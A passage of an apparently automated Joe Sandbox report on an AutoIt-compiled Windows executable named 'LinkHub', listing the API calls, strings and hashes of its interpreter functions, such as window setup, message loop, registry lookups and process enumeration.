Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: 80d971b41a0ec12cc423559a5331e3478ba5ef8064e748494d1b3628e53e21fd
Instruction ID: 49b2a636bca3b4724cc5091e87e21bb36bad860eeeb7279d45acc23e75228ef6
Opcode Fuzzy Hash: 80d971b41a0ec12cc423559a5331e3478ba5ef8064e748494d1b3628e53e21fd
Instruction Fuzzy Hash: 0951C270248344ABC711FF609C55FFEBBF8EBD5B44F0404ACF582521A2DBA48A4AD766

Function 00C1DD87 Relevance: 6.1, APIs: 4, Instructions: 86
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C1DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00C1DDBA
Process32NextW.KERNEL32(00000000,?), ref: 00C1DDDA
CloseHandle.KERNELBASE(00000000), ref: 00C1DE87

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 57f2c2ec655fa6e0f4a1eac5f499056d791a9bbac0c7170a9fa8b5928ff571af
Instruction ID: 7ca3797639a19f17a63bdcb2b2c602caf3d11461c12fe08462ee806c2d10f76a
Opcode Fuzzy Hash: 57f2c2ec655fa6e0f4a1eac5f499056d791a9bbac0c7170a9fa8b5928ff571af
Instruction Fuzzy Hash: E3315E711082019FD311EF54C885FFEBBE8AF9A350F04096DF592861A1DBB19A85CB92

Function 00BD5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00BD502E,00000003,00C798D8,0000000C,00BD5185,00000003,00000002,00000000,?,00BE2C59,00000003), ref: 00BD5079
TerminateProcess.KERNEL32(00000000,?,00BD502E,00000003,00C798D8,0000000C,00BD5185,00000003,00000002,00000000,?,00BE2C59,00000003), ref: 00BD5080
ExitProcess.KERNEL32 ref: 00BD5092

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 26d31723e7b3eaee22acc11705914a918a9bbbd2ae90f1d11187a4cf8c3ba128
Instruction ID: 5cbb32d61a47ef50f184297a4238a328b6310fbcfffa1db1b8cec8984070af51
Opcode Fuzzy Hash: 26d31723e7b3eaee22acc11705914a918a9bbbd2ae90f1d11187a4cf8c3ba128
Instruction Fuzzy Hash: DBE09235000548AFCB217F54DD09B987BA9EB51791B514095F85A9A632EB359942CAC0

Function 00BBEE56 Relevance: 21.6, APIs: 14, Instructions: 610windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00BBEF07
timeGetTime.WINMM ref: 00BBF107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BBF228
TranslateMessage.USER32(?), ref: 00BBF27B
DispatchMessageW.USER32(?), ref: 00BBF289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BBF29F
Sleep.KERNEL32(0000000A), ref: 00BBF2B1

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: dbe2118f795a56c4ced703664a7d094dd1662d541382b5fce6130d88f8baa361
Instruction ID: e4aa9c627838d287bc13195b6b7e5d79a55e14eecfe66a5a790e96762fb564cd
Opcode Fuzzy Hash: dbe2118f795a56c4ced703664a7d094dd1662d541382b5fce6130d88f8baa361
Instruction Fuzzy Hash: EA32E170608242EFD728DF24CC84BBAB7E5FF81304F5445A9F565972A1D7B1E984CB82

Function 00BB3624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BB3657
RegisterClassExW.USER32(00000030), ref: 00BB3681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB3692
InitCommonControlsEx.COMCTL32(?), ref: 00BB36AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BB36BF
LoadIconW.USER32(000000A9), ref: 00BB36D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BB36E4

Strings

TaskbarCreated, xrefs: 00BB3687
0, xrefs: 00BB3639
AutoIt v3 GUI, xrefs: 00BB3673
+, xrefs: 00BB3640

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 904e58aa384737ed979a68a14aa6d1fb5d80fe871cb1d351242eae9bf255f02e
Instruction ID: 5e8674fcd656f393b60c2c86ff06e2a28ff0f2dbd33ce49eb38b9c7050c77def
Opcode Fuzzy Hash: 904e58aa384737ed979a68a14aa6d1fb5d80fe871cb1d351242eae9bf255f02e
Instruction Fuzzy Hash: B521C0B5D01318AFDB00EFA4E889B9DBBB4FB09710F00511AFA12A72A0D7B54544DF94

Function 00BF09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BF071A: CreateFileW.KERNELBASE(00000000,00000000,?,00BF0A84,?,?,00000000,?,00BF0A84,00000000,0000000C), ref: 00BF0737

GetLastError.KERNEL32 ref: 00BF0AEF
__dosmaperr.LIBCMT ref: 00BF0AF6
GetFileType.KERNELBASE(00000000), ref: 00BF0B02
GetLastError.KERNEL32 ref: 00BF0B0C
__dosmaperr.LIBCMT ref: 00BF0B15
CloseHandle.KERNEL32(00000000), ref: 00BF0B35
CloseHandle.KERNEL32(?), ref: 00BF0C7F
GetLastError.KERNEL32 ref: 00BF0CB1
__dosmaperr.LIBCMT ref: 00BF0CB8

Strings

H, xrefs: 00BF0C3D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: e5b097d0d5021cdbde9a509a26470ab28236921dd6ec0215fd8a50bcbf22d982
Instruction ID: e1672e505cf17aed463ffd9d5cbfc2be5c49f2477e74c23b96fdec8e4d26c1a6
Opcode Fuzzy Hash: e5b097d0d5021cdbde9a509a26470ab28236921dd6ec0215fd8a50bcbf22d982
Instruction Fuzzy Hash: 28A10432A241498FDF19BF68D892BBD7BE0EB06324F14019AF9119F3A2D7319D16CB51

Function 00BB52A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BB5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00BF4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00BB55B2

Part of subcall function 00BB5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BB525A

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BB53C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BF4BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BF4C3E
RegCloseKey.ADVAPI32(?), ref: 00BF4C80
_wcslen.LIBCMT ref: 00BF4CE7
_wcslen.LIBCMT ref: 00BF4CF6

Strings

\Include\, xrefs: 00BB5381
\, xrefs: 00BF4CFC
Software\AutoIt v3\AutoIt, xrefs: 00BB53BA
Include, xrefs: 00BF4BF4, 00BF4C35

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: dd83bdd80e77a4e49d43a0f2bcaf85ac87ffe1c1c6ab3d1e0d81ea4ac3b7a3a0
Instruction ID: f33da02b35a2b960aee750b656b70242664a9faa21420babd037bb34f1ce68fa
Opcode Fuzzy Hash: dd83bdd80e77a4e49d43a0f2bcaf85ac87ffe1c1c6ab3d1e0d81ea4ac3b7a3a0
Instruction Fuzzy Hash: 2E718A711043459BC714EF65D881BAFBBE8FF98B40F80146EF541932B0EBB19A4ACB56

Function 00BB34D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BB34DE
LoadCursorW.USER32(00000000,00007F00), ref: 00BB34ED
LoadIconW.USER32(00000063), ref: 00BB3503
LoadIconW.USER32(000000A4), ref: 00BB3515
LoadIconW.USER32(000000A2), ref: 00BB3527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BB353F
RegisterClassExW.USER32(?), ref: 00BB3590

Part of subcall function 00BB3624: GetSysColorBrush.USER32(0000000F), ref: 00BB3657
Part of subcall function 00BB3624: RegisterClassExW.USER32(00000030), ref: 00BB3681
Part of subcall function 00BB3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB3692
Part of subcall function 00BB3624: InitCommonControlsEx.COMCTL32(?), ref: 00BB36AF
Part of subcall function 00BB3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BB36BF
Part of subcall function 00BB3624: LoadIconW.USER32(000000A9), ref: 00BB36D5
Part of subcall function 00BB3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BB36E4

Strings

0, xrefs: 00BB355F
AutoIt v3, xrefs: 00BB357F
#, xrefs: 00BB3566

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: c22d5a6a82835055d5c659e757e9d5211c030ecc01b9aefd25f0b8b5c4c14465
Instruction ID: 0771c05ffd8efbbffafe0bd9c0ab87adebf88f1d4369c5d223ea6c203c544e20
Opcode Fuzzy Hash: c22d5a6a82835055d5c659e757e9d5211c030ecc01b9aefd25f0b8b5c4c14465
Instruction Fuzzy Hash: 20213079D00314ABDB109FA5ED69BAD7FF8FB08B50F00401AF605A62B0D7B94545CF98

Function 00BB370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BB3709,?,?), ref: 00BB3777
KillTimer.USER32(?,00000001,?,?,?,?,?,00BB3709,?,?), ref: 00BB37A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BB37C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BB3709,?,?), ref: 00BB37D1
CreatePopupMenu.USER32 ref: 00BB37E5
PostQuitMessage.USER32(00000000), ref: 00BB3806

Strings

TaskbarCreated, xrefs: 00BB37CC

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: b6bb473e9ca147c32346b850f825e3c2a75d054cf2271bef751e15610ed54bae
Instruction ID: 4376d92e6283c10b3c03bf03e9022791ed52d2fb3d9a7efe876965f7e5aed9d2
Opcode Fuzzy Hash: b6bb473e9ca147c32346b850f825e3c2a75d054cf2271bef751e15610ed54bae
Instruction Fuzzy Hash: 3041C0F5240244BBDB142B69DCADFFD3AE9EB05B00F0401E5F502862A1DEE8EF449765

Function 00BB2AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BB2AF9
CoUninitialize.COMBASE ref: 00BB2B98
UnregisterHotKey.USER32(?), ref: 00BB2D7D
DestroyWindow.USER32(?), ref: 00BF3A1B
FreeLibrary.KERNEL32(?), ref: 00BF3A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BF3AAD

Strings

close all, xrefs: 00BB2AF4

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 5d5c851f76ca0bcb22c761e82242a6cd7059f51f2e2fdaaa3eb8d91cdd08febd
Instruction ID: 965d8c88a2a8af123aff4b0072a03579cac165de403232567bf05070b07a7986
Opcode Fuzzy Hash: 5d5c851f76ca0bcb22c761e82242a6cd7059f51f2e2fdaaa3eb8d91cdd08febd
Instruction Fuzzy Hash: 48D127716012129FCB29EF15C895AB9F7E0FF04B10F1542EDE94AAB262CB71AD56CF40

Function 00BE90C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bf48ed7ac4d55cf1f24d35a003cde521d1cad12a356ceb1a54ed27adda79dad
Instruction ID: 75a0c6b97cac7f8df677c96c9c51b6a6cfb6bd04e713f17ec0d7eb17079c93ad
Opcode Fuzzy Hash: 7bf48ed7ac4d55cf1f24d35a003cde521d1cad12a356ceb1a54ed27adda79dad
Instruction Fuzzy Hash: 17C1E47090428AAFDF11DFAAD841BADBBF4EF09310F1841D9E915AB3D2C7309946CB65

Function 00BCAC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d5m0, xrefs: 00BCAE75
d1r0,2, xrefs: 00BCACA9
d1b, xrefs: 00BCAD55, 00BCAE8E
d10m0, xrefs: 00BCACF0
i, xrefs: 00BCB0A3
d0b, xrefs: 00BCAC96, 00BCAD10, 00BCAEA7

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: fa308d68c0fab08d656151f8b0983070e98fa5fbafca9672b840c8a713990e85
Instruction ID: c80da7338a76067b5cbce4331ca4bec186efbc438feb53e8d659946c316f4dd9
Opcode Fuzzy Hash: fa308d68c0fab08d656151f8b0983070e98fa5fbafca9672b840c8a713990e85
Instruction Fuzzy Hash: 80621AB06083419FC724DF14C495AAEBBE1FF88304F14895EE49A9B391DB71DA49CF92

Function 00BB35B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BB35E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BB3602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00BB3368,?), ref: 00BB3616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00BB3368,?), ref: 00BB361F

Strings

edit, xrefs: 00BB35FC
AutoIt v3, xrefs: 00BB35D9, 00BB35DE, 00BB35DF

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 65e21d8585e70a317dc334dc725679d03b186d134fab6b9410f00ffd2883a977
Instruction ID: 48c760923df49854ef66d55c623bbabaa947887ee618a3d6ccb74b972cc9e9b9
Opcode Fuzzy Hash: 65e21d8585e70a317dc334dc725679d03b186d134fab6b9410f00ffd2883a977
Instruction Fuzzy Hash: 4EF0DA756403A47AEB3157176C1CF3B2EBDE7C7F60B00001EB905A7170D6695851EBB4

Function 00C21196 Relevance: 9.1, APIs: 6, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C211B3
ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00C211EE
EnterCriticalSection.KERNEL32(?), ref: 00C2120A
LeaveCriticalSection.KERNEL32(?), ref: 00C21283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C2129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C212C8

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: f103a82b33d24efacc4661e5c1f04bea129e975cdf84345debc94b7895f33929
Instruction ID: b2783184afc73495e35939a93f41f2ce50d230f108f59f824ee4f367643838e7
Opcode Fuzzy Hash: f103a82b33d24efacc4661e5c1f04bea129e975cdf84345debc94b7895f33929
Instruction Fuzzy Hash: CB415975A00215EBDF04AF54DC85BAAB7B8FF44310F1440A5FE04AA296DB30DE61DBA0

Function 00BB61A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BF5287

Part of subcall function 00BB8577: _wcslen.LIBCMT ref: 00BB858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BB6299

Strings

AutoIt - , xrefs: 00BB620D
Line %d: , xrefs: 00BF5305

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: fe308787decf507e1aeff8a64184bdba93cac1fccfa22cabddb706a37ce2011a
Instruction ID: 607fa95006c8568d8b410c59ab47aa013ae62889a2cf6c94dcb97e1907cfca5d
Opcode Fuzzy Hash: fe308787decf507e1aeff8a64184bdba93cac1fccfa22cabddb706a37ce2011a
Instruction Fuzzy Hash: 94418171408304ABD321EB60DC56FFF77ECAF45320F0046AEF595921A1EBB49A49C796

Function 00BB58CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BB58BE,SwapMouseButtons,00000004,?), ref: 00BB58EF
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BB58BE,SwapMouseButtons,00000004,?), ref: 00BB5910
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00BB58BE,SwapMouseButtons,00000004,?), ref: 00BB5932

Strings

Control Panel\Mouse, xrefs: 00BB58ED

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
